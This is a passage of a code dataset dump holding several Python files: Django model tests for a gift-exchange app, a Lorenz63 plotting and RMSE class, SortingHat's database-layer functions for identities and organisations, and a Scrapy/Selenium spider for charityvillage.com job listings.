self.assertRaises(IntegrityError):\n Participant.objects.create(first_name='Dale', last_name='Hammond', email='DaleKHammond@armyspy.com')\n\n def test_string_representation(self):\n participant = Participant.objects.create(first_name='Dale', last_name='Hammond',\n email='DaleKHammond@armyspy.com')\n self.assertEqual(str(participant), participant.email)\n\n # test for a bad email\n # test for no email\n\n\nclass RuleModelTest(TestCase):\n\n def test_rule_creation(self):\n rule = Rule.objects.create(text='Must be handmade.')\n self.assertTrue(isinstance(rule, Rule))\n\n def test_duplicate_rule(self):\n Rule.objects.create(text='Must be handmade.')\n\n with self.assertRaises(IntegrityError):\n Rule.objects.create(text='Must be handmade.')\n\n def test_string_representation(self):\n rule = Rule.objects.create(text='Must be handmade.')\n self.assertEqual(str(rule), rule.text)\n\n\nclass PartyModelTest(TestCase):\n\n def setUp(self):\n User.objects.create(first_name='Dale', last_name='Hammond', email='DaleKHammond@armyspy.com')\n Participant.objects.create(first_name='Kristen', last_name='Conway', email='KristenCConway@dayrep.com')\n Participant.objects.create(first_name='Dale', last_name='Hammond', email='DaleKHammond@armyspy.com')\n Rule.objects.create(text='Must be handmade.')\n Rule.objects.create(text='Must be less than $5.')\n\n self.master_party = Party(\n party_date=datetime.datetime(2018, 12, 25),\n owner_id=User.objects.get(id=1),\n\n )\n self.master_party.save()\n\n def test_party_creation(self):\n party = Party(\n party_date=datetime.datetime(2018, 12, 25),\n owner_id=User.objects.get(id=1),\n\n )\n party.save()\n self.assertTrue(isinstance(party, Party))\n\n def test_party_owner_is_user(self):\n party = Party(\n party_date=datetime.datetime(2018, 12, 25),\n owner_id=User.objects.get(id=1),\n\n )\n party.save()\n self.assertEqual(Party.objects.get(id=1).owner_id, User.objects.get(id=1))\n\n def test_add_rule(self):\n self.master_party.rules.add(1)\n self.assertEqual(Rule.objects.get(id=1).text, 'Must be handmade.')\n\n def test_string_representation(self):\n party = self.master_party\n self.assertEqual(str(party), str(party.name))\n\n\nclass PairModelTest(TestCase):\n\n def setUp(self):\n User.objects.create(first_name='Dale', last_name='Hammond', email='DaleKHammond@armyspy.com')\n Participant.objects.create(first_name='Kristen', last_name='Conway', email='KristenCConway@dayrep.com')\n Participant.objects.create(first_name='Dale', last_name='Hammond', email='DaleKHammond@armyspy.com')\n Rule.objects.create(text='Must be handmade.')\n\n self.master_party = Party(\n party_date=datetime.datetime(2018, 12, 25),\n owner_id=User.objects.get(id=1),\n\n )\n self.master_party.save()\n\n def create_pair(self, gifter_id, recipient_id, party_id):\n return Pair.objects.create(\n gifter=Participant.objects.get(id=gifter_id),\n recipient=Participant.objects.get(id=recipient_id),\n party_id=Party.objects.get(id=party_id)\n )\n\n def test_pair_creation(self):\n pair = self.create_pair(1, 2, 1)\n self.assertTrue(isinstance(pair, Pair))\n\n def test_duplicate_pair_creation(self):\n self.create_pair(1, 2, 1)\n\n with self.assertRaises(IntegrityError):\n self.create_pair(1, 2, 1)\n","sub_path":"tests_unit/test_models.py","file_name":"test_models.py","file_ext":"py","file_size_in_byte":5939,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"299964035","text":"# coding: utf-8\n\nimport numpy as np\nimport matplotlib.pyplot as plt\n\nclass Visualization():\n def __init__(self,obs, true, sim, da, interval, nt_asm, name,xlim):\n self.obs = obs\n self.true = true\n self.sim = sim\n self.da = da\n self.interval = interval\n self.nt_asm = nt_asm\n self.name = name\n self.xlim = xlim\n\n def fit(self):\n fig = plt.figure(figsize=(12, 3)) # figureオブジェクト作成\n _xrange = range(len(self.true))\n\n if(self.obs != None):\n _xrange2 = range(0,self.nt_asm,self.interval)\n _xobs2 = []\n for i in range(0,self.nt_asm,self.interval):\n _xobs2.append(self.obs[i])\n plt.scatter(_xrange2,_xobs2,color='red',label='Obs.')\n plt.plot(_xrange,self.true,color='green',label='True')\n plt.plot(_xrange,self.sim,color='blue',label='Sim.')\n plt.plot(_xrange,self.da,color='purple',label='DA')\n plt.xlabel(\"Time Step\",size=12)\n plt.ylabel(self.name,size=12)\n plt.xlim(0,self.xlim)\n plt.legend()\n plt.show()\n def rmse(self):\n _rmse_da= 0.0\n for i in range(len(self.da)):\n _rmse_da = _rmse_da + (self.true[i] - self.da[i])**2\n _rmse_da = np.sqrt(_rmse_da/len(self.da))\n _rmse_sim= 0.0\n for i in range(len(self.sim)):\n _rmse_sim = _rmse_sim + (self.true[i] - self.sim[i])**2\n _rmse_sim = np.sqrt(_rmse_sim/len(self.da))\n print (\"RMSE of Simulation = \", _rmse_sim)\n print (\"RMSE of DA result = \", _rmse_da)\n","sub_path":"Lorenz63/Visualization.py","file_name":"Visualization.py","file_ext":"py","file_size_in_byte":1591,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"259935156","text":"# -*- coding: utf-8 -*-\n#\n# Copyright (C) 2014-2021 Bitergia\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation; either version 3 of the License, or\n# (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program. If not, see .\n#\n# Authors:\n# Santiago Dueñas \n# Miguel Ángel Fernández \n#\n\nimport copy\nimport logging\nimport re\n\nimport django.core.exceptions\nimport django.db.utils\n\nfrom django.db.models import Q\n\nfrom grimoirelab_toolkit.datetime import datetime_utcnow, datetime_to_utc\n\nfrom .errors import AlreadyExistsError, NotFoundError, LockedIdentityError\nfrom .models import (MIN_PERIOD_DATE,\n MAX_PERIOD_DATE,\n Organization,\n Domain,\n Country,\n Individual,\n Identity,\n Profile,\n Enrollment,\n Operation)\nfrom .utils import validate_field\n\n\nlogger = logging.getLogger(__name__)\n\n\ndef _set_lock(individual, lock_flag):\n \"\"\"Set a lock value for a given individual.\n\n Sets the `is_locked` field from a given `individual`\n object to the boolean value from `lock` variable.\n\n :param individual: individual which `is_locked` parameter will be set\n :param lock_flag: bool value to be set to `is_locked` parameter from the `individual`\n\n :returns: the individual entity with `is_locked` field updated\n \"\"\"\n individual.is_locked = lock_flag\n individual.save()\n\n return individual\n\n\ndef find_individual(mk):\n \"\"\"Find an individual entity.\n\n Find an individual by its main key (`mk`) in the database.\n When the individual does not exist the function will\n raise a `NotFoundError`.\n\n :param mk: main key or id of the individual to find\n\n :returns: an individual object\n\n :raises NotFoundError: when the individual with\n the given `mk` does not exists.\n \"\"\"\n try:\n logger.debug(f\"Finding individual {mk} by main key ...\")\n individual = Individual.objects.get(mk=mk)\n except Individual.DoesNotExist:\n logger.debug(f\"Individual with main key {mk} does not exist\")\n raise NotFoundError(entity=mk)\n else:\n logger.debug(f\"Individual with main key {mk} was found\")\n return individual\n\n\ndef find_individual_by_uuid(uuid):\n \"\"\"Find an individual by its identities UUIDs.\n\n Find an individual which identities have the parameter\n `uuid` as their identifier. When such individual does\n not exists the function will raise a `NotFoundError`.\n\n :param uuid: id to search the individual\n\n :returns: an individual object\n\n :raises NotFoundError: when the individual does\n not exist.\n \"\"\"\n try:\n logger.debug(f\"Finding individual {uuid} by UUID ...\")\n individual = Individual.objects.filter(\n Q(mk=uuid) | Q(identities__uuid=uuid)\n )[0]\n except IndexError:\n logger.debug(f\"Individual with UUID {uuid} does not exist\")\n raise NotFoundError(entity=uuid)\n else:\n logger.debug(f\"Individual with UUID {uuid} was found\")\n return individual\n\n\ndef find_identity(uuid):\n \"\"\"Find an identity.\n\n Find an identity by its UUID in the database. When the\n identity does not exist the function will raise\n a `NotFoundError`.\n\n :param uuid: id of the identity to find\n\n :returns: an identity object\n\n :raises NotFoundError: when the identity with the\n given `uuid` does not exists.\n \"\"\"\n try:\n logger.debug(f\"Finding identity UUID {uuid} ...\")\n identity = Identity.objects.get(uuid=uuid)\n except Identity.DoesNotExist:\n logger.debug(f\"Identity with UUID {uuid} does not exist\")\n raise NotFoundError(entity=uuid)\n else:\n logger.debug(f\"Identity with UUID {uuid} was found\")\n return identity\n\n\ndef find_organization(name):\n \"\"\"Find an organization.\n\n Find an organization by its name in the database. When the\n organization does not exist the function will raise\n a `NotFoundError`.\n\n :param name: name of the organization to find\n\n :returns: an organization object\n\n :raises NotFoundError: when the organization with the\n given `name` does not exists.\n \"\"\"\n validate_field('name', name)\n\n try:\n logger.debug(f\"Finding organization '{name}' ...\")\n organization = Organization.objects.get(name=name)\n except Organization.DoesNotExist:\n logger.debug(f\"Organization with name '{name}' does not exist\")\n raise NotFoundError(entity=name)\n else:\n logger.debug(f\"Organization with name '{name}' was found\")\n return organization\n\n\ndef find_domain(domain_name):\n \"\"\"Find a domain.\n\n Find a domain by its name in the database. When the\n domain does not exist the function will raise\n a `NotFoundError`.\n\n :param domain_name: name of the domain to find\n\n :returns: a domain object\n\n :raises NotFoundError: when the domain with the\n given `name` does not exists.\n \"\"\"\n validate_field('domain_name', domain_name)\n\n try:\n logger.debug(f\"Finding domain '{domain_name}' ...\")\n domain = Domain.objects.get(domain=domain_name)\n except Domain.DoesNotExist:\n logger.debug(f\"Domain with name '{domain_name}' does not exist\")\n raise NotFoundError(entity=domain_name)\n else:\n logger.debug(f\"Domain with name '{domain_name}' was found\")\n return domain\n\n\ndef search_enrollments_in_period(mk, org_name,\n from_date=MIN_PERIOD_DATE,\n to_date=MIN_PERIOD_DATE):\n \"\"\"Look for enrollments in a given period.\n\n Returns the enrollments of an individual for a given\n organization during period of time.\n\n An empty list will be returned when no enrollments could be\n found, due to the individual or the organization do not\n exist, or there are not enrollments assigned for that period.\n\n :param mk: main key of the individual\n :param org_name: name of the organization\n :param from_date: starting date for the period\n :param to_date: ending date for the period\n\n :returns: a list of enrollment objects\n \"\"\"\n logger.debug(\n f\"Run enrollments search; \"\n f\"individual='{mk}' organization='{org_name}'\"\n f\"from='{from_date}' to='{to_date}'\"\n )\n return Enrollment.objects.filter(individual__mk=mk,\n organization__name=org_name,\n start__lte=to_date, end__gte=from_date).order_by('start')\n\n\ndef add_organization(trxl, name):\n \"\"\"Add an organization to the database.\n\n This function adds a new organization to the database,\n using the given `name` as an identifier. Name cannot be\n empty or `None`.\n\n It returns a new `Organization` object.\n\n :param trxl: TransactionsLog object from the method calling this one\n :param name: name of the organization\n\n :returns: a new organization\n\n :raises ValueError: when `name` is `None` or empty.\n :raises AlreadyExistsError: when an instance with the same name\n already exists in the database.\n \"\"\"\n # Setting operation arguments before they are modified\n op_args = {\n 'name': name\n }\n\n validate_field('name', name)\n\n organization = Organization(name=name)\n\n try:\n organization.save()\n except django.db.utils.IntegrityError as exc:\n _handle_integrity_error(Organization, exc)\n\n trxl.log_operation(op_type=Operation.OpType.ADD, entity_type='organization',\n timestamp=datetime_utcnow(), args=op_args,\n target=op_args['name'])\n\n return organization\n\n\ndef delete_organization(trxl, organization):\n \"\"\"Remove an organization from the database.\n\n Function that removes from the database the organization\n given in `organization`. Data related such as domains\n or enrollments are also removed.\n\n :param trxl: TransactionsLog object from the method calling this one\n :param organization: organization to remove\n \"\"\"\n # Setting operation arguments before they are modified\n op_args = {\n 'organization': organization.name\n }\n\n last_modified = datetime_utcnow()\n Individual.objects.filter(enrollments__organization=organization).\\\n update(last_modified=last_modified)\n\n organization.delete()\n\n trxl.log_operation(op_type=Operation.OpType.DELETE, entity_type='organization',\n timestamp=datetime_utcnow(), args=op_args,\n target=op_args['organization'])\n\n\ndef add_domain(trxl, organization, domain_name, is_top_domain=True):\n \"\"\"Add a domain to the database.\n\n This function adds a new domain to the database using\n `domain_name` as its identifier. The new domain will\n also be linked to the organization object in `organization`.\n\n Values assigned to `domain_name` cannot be `None` or empty.\n The parameter `is_top_domain` only accepts `bool` values.\n\n As a result, the function returns a new `Domain` object.\n\n :param trxl: TransactionsLog object from the method calling this one\n :param organization: links the new domain to this organization object\n :param domain_name: name of the domain\n :param is_top_domain: set this domain as a top domain\n\n :returns: a new domain\n\n :raises ValueError: raised when `domain_name` is `None` or an empty string;\n when `is_top_domain` does not have a `bool` value.\n \"\"\"\n # Setting operation arguments before they are modified\n op_args = {\n 'organization': organization.name,\n 'domain_name': domain_name,\n 'is_top_domain': is_top_domain\n }\n\n validate_field('domain_name', domain_name)\n if not isinstance(is_top_domain, bool):\n raise ValueError(\"'is_top_domain' must have a boolean value\")\n\n domain = Domain(domain=domain_name,\n is_top_domain=is_top_domain,\n organization=organization)\n\n try:\n domain.save()\n except django.db.utils.IntegrityError as exc:\n _handle_integrity_error(Domain, exc)\n\n trxl.log_operation(op_type=Operation.OpType.ADD, entity_type='domain',\n timestamp=datetime_utcnow(), args=op_args,\n target=op_args['organization'])\n\n return domain\n\n\ndef delete_domain(trxl, domain):\n \"\"\"Remove a domain from the database.\n\n Deletes from the database the domain given in `domain`.\n\n :param trxl: TransactionsLog object from the method calling this one\n :param domain: domain to remove\n \"\"\"\n # Setting operation arguments before they are modified\n op_args = {\n 'domain': domain.domain\n }\n\n domain.delete()\n\n trxl.log_operation(op_type=Operation.OpType.DELETE, entity_type='domain',\n timestamp=datetime_utcnow(), args=op_args,\n target=op_args['domain'])\n\n\ndef add_individual(trxl, mk):\n \"\"\"Add an individual to the database.\n\n This function adds an individual to the database with\n `mk` string as its main key (i.e main identifier). This\n identifier cannot be empty or `None`.\n\n When the individual is added, a new empty profile for\n this object is created too.\n\n As a result, the function returns a new `Individual`\n object.\n\n :param trxl: TransactionsLog object from the method calling this one\n :param mk: main key for the individual\n\n :returns: a new individual\n\n :raises ValueError: when `mk` is `None` or an empty string\n \"\"\"\n # Setting operation arguments before they are modified\n op_args = {\n 'mk': mk\n }\n\n validate_field('mk', mk)\n\n individual = Individual(mk=mk)\n\n try:\n individual.save(force_insert=True)\n except django.db.utils.IntegrityError as exc:\n _handle_integrity_error(Individual, exc)\n\n trxl.log_operation(op_type=Operation.OpType.ADD, entity_type='individual',\n timestamp=datetime_utcnow(), args=op_args,\n target=op_args['mk'])\n\n profile = Profile(individual=individual)\n\n try:\n profile.save()\n except django.db.utils.IntegrityError as exc:\n _handle_integrity_error(Profile, exc)\n\n individual.refresh_from_db()\n\n return individual\n\n\ndef delete_individual(trxl, individual):\n \"\"\"Remove an individual from the database.\n\n Function that removes from the database the individual\n given in `individual`. Data related to it will be also\n removed.\n\n :param trxl: TransactionsLog object from the method calling this one\n :param individual: individual to remove\n \"\"\"\n # Setting operation arguments before they are modified\n op_args = {\n 'individual': individual.mk\n }\n\n if individual.is_locked:\n raise LockedIdentityError(uuid=individual.mk)\n\n individual.delete()\n\n trxl.log_operation(op_type=Operation.OpType.DELETE, entity_type='individual',\n timestamp=datetime_utcnow(), args=op_args,\n target=op_args['individual'])\n\n\ndef add_identity(trxl, individual, uuid, source,\n name=None, email=None, username=None):\n \"\"\"Add an identity to the database.\n\n This function adds a new identity to the database using\n `uuid` as its identifier. The new identity will\n also be linked to the individual object of `individual`.\n\n Neither the values given to `uuid` nor to `source` can\n be `None` or empty. Moreover, `name`, `email` or `username`\n parameters need a non empty value.\n\n As a result, the function returns a new `Identity` object.\n\n :param trxl: TransactionsLog object from the method calling this one\n :param individual: links the new identity to this individual object\n :param uuid: identifier for the new identity\n :param source: data source where this identity was found\n :param name: full name of the identity\n :param email: email of the identity\n :param username: user name used by the identity\n\n :returns: a new identity\n\n :raises ValueError: when `uuid` and `source` are `None` or empty;\n when all of the data parameters are `None` or empty.\n \"\"\"\n # Setting operation arguments before they are modified\n op_args = {\n 'individual': individual.mk,\n 'uuid': uuid,\n 'source': source,\n 'name': name,\n 'email': email,\n 'username': username\n }\n\n if individual.is_locked:\n raise LockedIdentityError(uuid=individual.mk)\n\n validate_field('uuid', uuid)\n validate_field('source', source)\n validate_field('name', name, allow_none=True)\n validate_field('email', email, allow_none=True)\n validate_field('username', username, allow_none=True)\n\n if not (name or email or username):\n raise ValueError(\"identity data cannot be None or empty\")\n\n try:\n identity = Identity(uuid=uuid, name=name, email=email,\n username=username, source=source,\n individual=individual)\n identity.save(force_insert=True)\n individual.save()\n except django.db.utils.IntegrityError as exc:\n _handle_integrity_error(Identity, exc)\n\n trxl.log_operation(op_type=Operation.OpType.ADD, entity_type='identity',\n timestamp=datetime_utcnow(), args=op_args,\n target=op_args['individual'])\n\n return identity\n\n\ndef delete_identity(trxl, identity):\n \"\"\"Remove an identity from the database.\n\n This function removes from the database the identity given\n in `identity`. Take into account this function does not\n remove individual in the case they get empty.\n\n :param trxl: TransactionsLog object from the method calling this one\n :param identity: identity to remove\n \"\"\"\n # Setting operation arguments before they are modified\n op_args = {\n 'identity': identity.uuid\n }\n\n if identity.individual.is_locked:\n raise LockedIdentityError(uuid=identity.individual.mk)\n\n identity.delete()\n identity.individual.save()\n\n trxl.log_operation(op_type=Operation.OpType.DELETE, entity_type='identity',\n timestamp=datetime_utcnow(), args=op_args,\n target=op_args['identity'])\n\n\ndef update_profile(trxl, individual, **kwargs):\n \"\"\"Update individual profile.\n\n This function allows to edit or update the profile information\n of the given individual. The values to update are given\n as keyword arguments. The allowed keys are listed below\n (other keywords will be ignored):\n\n - `name`: name of the individual\n - `email`: email address of the individual\n - `gender`: gender of the individual\n - `gender_acc`: gender accuracy (range of 1 to 100; by default, set to 100)\n - `is_bot`: boolean value to determine whether an individual is\n a bot or not. By default, this value is initialized to\n `False`.\n - `country_code`: ISO-3166 country code\n\n As a result, it will return the `Individual` object with\n the updated data.\n\n :param trxl: TransactionsLog object from the method calling this one\n :param individual: individual whose profile will be updated\n :param kwargs: parameters to edit the profile\n\n :returns: individual object with the updated profile\n\n :raises ValueError: raised either when `is_bot` does not have a boolean value;\n `gender_acc` is not an `int` or is not in range.\n \"\"\"\n\n def to_none_if_empty(x):\n return None if not x else x\n\n # Setting operation arguments before they are modified\n op_args = copy.deepcopy(kwargs)\n op_args.update({'individual': individual.mk})\n\n if individual.is_locked:\n raise LockedIdentityError(uuid=individual.mk)\n\n profile = individual.profile\n\n if 'name' in kwargs:\n profile.name = to_none_if_empty(kwargs['name'])\n if 'email' in kwargs:\n profile.email = to_none_if_empty(kwargs['email'])\n\n if 'is_bot' in kwargs:\n is_bot = kwargs['is_bot']\n\n if not isinstance(is_bot, bool):\n raise ValueError(\"'is_bot' must have a boolean value\")\n\n profile.is_bot = is_bot\n\n if 'country_code' in kwargs:\n code = to_none_if_empty(kwargs['country_code'])\n\n if code:\n try:\n country = Country.objects.get(code=code)\n except django.core.exceptions.ObjectDoesNotExist:\n msg = \"'country_code' ({}) does not match with a valid code\"\n raise ValueError(msg.format(str(code)))\n\n profile.country = country\n else:\n profile.country = None\n\n if 'gender' in kwargs:\n gender = to_none_if_empty(kwargs['gender'])\n gender_acc = None\n\n if gender:\n gender_acc = kwargs.get('gender_acc', 100)\n\n if not isinstance(gender_acc, int):\n raise ValueError(\"'gender_acc' must have an integer value\")\n elif not 1 <= gender_acc <= 100:\n raise ValueError(\"'gender_acc' (%d) is not in range (1,100)\"\n % gender_acc)\n\n profile.gender = gender\n profile.gender_acc = gender_acc\n elif 'gender_acc' in kwargs:\n raise ValueError(\"'gender_acc' can only be set when 'gender' is given\")\n\n profile.save()\n individual.save()\n\n trxl.log_operation(op_type=Operation.OpType.UPDATE, entity_type='profile',\n timestamp=datetime_utcnow(), args=op_args,\n target=op_args['individual'])\n\n return individual\n\n\ndef add_enrollment(trxl, individual, organization,\n start=MIN_PERIOD_DATE, end=MAX_PERIOD_DATE):\n \"\"\"Enroll an individual to an organization in the database.\n\n The function adds a new relationship between the individual\n in `individual` and the given `organization` to the database.\n\n The period of the enrollment can be given with the parameters\n `from_date` and `to_date`, where `from_date <= to_date`.\n Default values for these dates are `MIN_PERIOD_DATE` and\n `MAX_PERIOD_DATE`. These dates cannot be `None`.\n\n This function returns as result a new `Enrollment` object.\n\n :param trxl: TransactionsLog object from the method calling this one\n :param individual: individual to enroll\n :param organization: organization where the individual is enrolled\n :param start: date when the enrollment starts\n :param end: date when the enrollment ends\n\n :returns: a new enrollment\n\n :raises ValueError: when either `start` or `end` are `None`;\n when `start < MIN_PERIOD_DATE`; or `end > MAX_PERIOD_DATE`\n or `start > end`.\n \"\"\"\n # Setting operation arguments before they are modified\n op_args = {\n 'individual': individual.mk,\n 'organization': organization.name,\n 'start': copy.deepcopy(str(start)),\n 'end': copy.deepcopy(str(end))\n }\n\n if individual.is_locked:\n raise LockedIdentityError(uuid=individual.mk)\n\n if not start:\n raise ValueError(\"'start' date cannot be None\")\n if not end:\n raise ValueError(\"'end' date cannot be None\")\n\n start = datetime_to_utc(start)\n end = datetime_to_utc(end)\n\n if start < MIN_PERIOD_DATE or start > MAX_PERIOD_DATE:\n raise ValueError(\"'start' date {} is out of bounds\".format(start))\n if end < MIN_PERIOD_DATE or end > MAX_PERIOD_DATE:\n raise ValueError(\"'end' date {} is out of bounds\".format(end))\n if start > end:\n raise ValueError(\"'start' date {} cannot be greater than {}\".format(start, end))\n\n try:\n enrollment = Enrollment(individual=individual,\n organization=organization,\n start=start, end=end)\n enrollment.save()\n individual.save()\n except django.db.utils.IntegrityError as exc:\n _handle_integrity_error(Identity, exc)\n\n trxl.log_operation(op_type=Operation.OpType.ADD, entity_type='enrollment',\n timestamp=datetime_utcnow(), args=op_args,\n target=op_args['individual'])\n\n return enrollment\n\n\ndef delete_enrollment(trxl, enrollment):\n \"\"\"Remove an enrollment from the database.\n\n This function removes from the database the enrollment given\n in `enrollment`.\n\n :param trxl: TransactionsLog object from the method calling this one\n :param enrollment: enrollment object to remove\n \"\"\"\n # Setting operation arguments before they are modified\n op_args = {\n 'mk': enrollment.individual.mk,\n 'organization': enrollment.organization.name,\n 'start': str(enrollment.start),\n 'end': str(enrollment.end)\n }\n\n if enrollment.individual.is_locked:\n raise LockedIdentityError(uuid=enrollment.individual.mk)\n\n enrollment.delete()\n enrollment.individual.save()\n\n trxl.log_operation(op_type=Operation.OpType.DELETE, entity_type='enrollment',\n timestamp=datetime_utcnow(), args=op_args,\n target=op_args['mk'])\n\n\ndef move_identity(trxl, identity, individual):\n \"\"\"Move an identity to an individual.\n\n Shifts `identity` to the individual given in `individual`.\n As a result, it will return `individual` object with list of\n identities updated.\n\n When `identity` is already assigned to `individual`, the function\n will raise an `ValueError` exception.\n\n :param trxl: TransactionsLog object from the method calling this one\n :param identity: identity to be moved\n :param individual: individual where `identity` will be moved\n\n :returns: the individual with related identities updated\n\n :raises ValueError: when `identity` is already part of `individual`\n \"\"\"\n # Setting operation arguments before they are modified\n op_args = {\n 'identity': identity.uuid,\n 'individual': individual.mk\n }\n\n if identity.individual.is_locked:\n raise LockedIdentityError(uuid=identity.individual.mk)\n if individual.is_locked:\n raise LockedIdentityError(uuid=individual.mk)\n if identity.individual == individual:\n msg = \"identity '{}' is already assigned to '{}'\".format(identity.uuid, individual.mk)\n raise ValueError(msg)\n\n old_individual = identity.individual\n identity.individual = individual\n\n identity.save()\n old_individual.save()\n individual.save()\n\n trxl.log_operation(op_type=Operation.OpType.UPDATE, entity_type='identity',\n timestamp=datetime_utcnow(), args=op_args,\n target=op_args['identity'])\n\n return individual\n\n\ndef lock(trxl, individual):\n \"\"\"Lock a given individual.\n\n Locks a given `individual` object so this object and its related objects\n such as identities, enrollments or its profile cannot be modified.\n\n :param trxl: TransactionsLog object from the method calling this one\n :param individual: individual which will be locked\n\n :returns: the individual with lock parameter updated\n \"\"\"\n op_args = {\n 'mk': individual.mk,\n 'is_locked': True\n }\n\n _set_lock(individual, True)\n\n trxl.log_operation(op_type=Operation.OpType.UPDATE, entity_type='individual',\n timestamp=datetime_utcnow(), args=op_args,\n target=op_args['mk'])\n\n return individual\n\n\ndef unlock(trxl, individual):\n \"\"\"Unlock a given individual.\n\n Unlocks a given `individual` object so this object and its related objects\n such as identities, enrollments or its profile can be modified.\n\n :param trxl: TransactionsLog object from the method calling this one\n :param individual: individual which will be unlocked\n\n :returns: the individual with lock parameter updated\n \"\"\"\n op_args = {\n 'mk': individual.mk,\n 'is_locked': False\n }\n\n _set_lock(individual, False)\n\n trxl.log_operation(op_type=Operation.OpType.UPDATE, entity_type='individual',\n timestamp=datetime_utcnow(), args=op_args,\n target=op_args['mk'])\n\n return individual\n\n\n_MYSQL_DUPLICATE_ENTRY_ERROR_REGEX = re.compile(r\"Duplicate entry '(?P.+)' for key\")\n\n\ndef _handle_integrity_error(model, exc):\n \"\"\"Handle integrity error exceptions.\"\"\"\n\n logger.debug(\"Database operation aborted; integrity error;\",\n exc_info=True)\n\n m = re.match(_MYSQL_DUPLICATE_ENTRY_ERROR_REGEX,\n exc.__cause__.args[1])\n if not m:\n raise exc\n\n entity = model.__name__\n eid = m.group('value')\n\n raise AlreadyExistsError(entity=entity, eid=eid)\n","sub_path":"sortinghat/core/db.py","file_name":"db.py","file_ext":"py","file_size_in_byte":27071,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"566541094","text":"import urllib.parse\nimport scrapy\nimport abc\nimport time\nfrom bs4 import BeautifulSoup\nfrom scrapy_selenium import SeleniumRequest\nfrom ..items import Job\n\nSCROLL_DOWN='window.scrollTo(0,document.body.scrollHeight);'\n\nclass Scraper_charityvillage_com(scrapy.Spider):\n \"\"\"Use SeleniumRequest because website require javascript\"\"\"\n\n name = \"charityvillage.com\"\n allowed_domains = [name]\n start_urls=['https://charityvillage.com/search/#results/5f4583ff061c57fc640eb1dc?job_type=-Unpaid+Volunteer+Position&page_num=1&kw=']\n\n def start_requests(self):\n for url in self.start_urls:\n # Auto scroll down\n yield SeleniumRequest(url=url, callback=self.parse, \n wait_time=self.selenium_wait_time , \n script=SCROLL_DOWN)\n\n def __init__(self, url=None, start_urls=None, load_full_jobs=False, load_all_pages=False, selenium_wait_time=20):\n\n self.start_urls=[url] if url else start_urls if start_urls else type(self).start_urls\n self.load_full_jobs=load_full_jobs\n self.load_all_pages=load_all_pages\n self.selenium_wait_time=selenium_wait_time\n\n def parse(self, response):\n \"\"\"\n @with_selenium\n @url https://charityvillage.com/search/#results/5f4583ff061c57fc640eb1dc?job_type=-Unpaid+Volunteer+Position&page_num=1&kw=\n @returns items 20 20\n @scrape_not_none url title date_posted apply_before organisation location\n \"\"\"\n page_jobs=[]\n\n \"\"\" Iterating through the result of get_jobs_list()\"\"\"\n\n jobs_div_list=self.get_jobs_list(response)\n for div in jobs_div_list:\n \n # Calling abstarct method get_job_dict()\n job_dict=self.get_job_dict(div)\n \n page_jobs.append(job_dict)\n \n \"\"\"\n Load full job page only if:\n - load_full_jobs=Yes\n \"\"\"\n if ( self.load_full_jobs ):\n # Call parse_full_job_page() with job URL\n yield SeleniumRequest(url=job_dict['url'], \n callback=self.parse_full_job_page,\n cb_kwargs=dict(job_dict=job_dict),\n wait_time=self.selenium_wait_time,\n script=SCROLL_DOWN)\n \n else:\n yield Job(job_dict)\n\n \"\"\" Just printing \"\"\"\n if self.load_full_jobs:\n print(\"Scraping {} jobs from {}...\".format(len(page_jobs), response.url))\n else:\n if self.load_all_pages==False:\n print(\"Scraped {} jobs from {}. load_all_pages=False and load_full_jobs=False, some new job postings and job informations might be missing\".format(len(page_jobs), response.url))\n else:\n print(\"Scraped {} jobs from {}. load_full_jobs=False, some informations might be missing\".format(len(page_jobs), response.url))\n \n \"\"\"\n Scrape next page if\n - load_all_pages=True and get_next_page_url() is not None\n \"\"\"\n if self.load_all_pages:\n if self.get_next_page_url(response)!=None :\n # Loading next page...\n yield SeleniumRequest(\n url=self.get_next_page_url(response),\n callback=self.parse,\n wait_time=self.selenium_wait_time,\n script=SCROLL_DOWN,\n dont_filter=True)\n else:\n print(\"No more pages to load\")\n \n def get_jobs_list(self, response):\n \"\"\"\n Arguments: \n - response: scrapy response object for the listing page\n \n Return a Selector list. \n The result will be automatically iterated in `parse()` method. \n The items will be passed to `get_job_dict()`.\n \n @with_selenium\n @url https://charityvillage.com/search/#results/5f4583ff061c57fc640eb1dc?job_type=-Unpaid+Volunteer+Position&page_num=1&kw=\n @returns_valid_selectorlist\n \"\"\"\n return response.xpath('//ul[contains(@class,\"job-search-results\")]/li')\n\n def get_job_dict(self, selector):\n \"\"\"\n Arguments: \n - selector: selector object of the job posting in the listing \n\n Return a dict {'url':'https://job-url' , 'title':'Job title', 'organisation':'My community' [...] }\n \"\"\"\n return {\n 'url':selector.xpath('div/div[contains(@class, \"cl-job-cta\")]/a/@href').get(), \n 'date_posted':selector.xpath('div/div[contains(@class, \"cl-job-info-cont\")]/div[contains(@class, \"cl-job-dates\")]/span[1]/text()').get().split(\"Published: \",1)[-1],\n 'apply_before':selector.xpath('div/div[contains(@class, \"cl-job-info-cont\")]/div[contains(@class, \"cl-job-dates\")]/span[2]/text()').get().split(\"Expiry: \",1)[-1],\n 'organisation':selector.xpath('div/div[contains(@class, \"cl-job-info-cont\")]/span[contains(@class, \"cl-job-company\")]/text()').get(),\n 'location':selector.xpath('div/div[contains(@class, \"cl-job-info-cont\")]/span[contains(@class, \"cl-job-location\")]/text()').get(),\n 'title':selector.xpath('div/div[contains(@class, \"cl-job-info-cont\")]/a[contains(@class,\"cl-job-link\")]/h2/text()').get()\n }\n\n def parse_full_job_page(self, response, job_dict):\n \"\"\"\n Arguments: \n - response: scrapy response object for the job page \n - job_dict: dict containing job raw data, \n this function must return a new Job() FROM this \n data and any other relevant info from the job page \n\n This method is called by `parse()` method if load_full_jobs \n Return a Job() \n\n @with_selenium\n @auto_job_url charityvillage.com\n @scrape_not_none url title description organisation date_posted apply_before location\n @returns items 1 1 \n \"\"\"\n job_dict['description']=BeautifulSoup(response.xpath('//div[contains(@class, \"post-content\")]').get()).get_text()\n return Job(job_dict)\n\n def get_next_page_url(self, response):\n 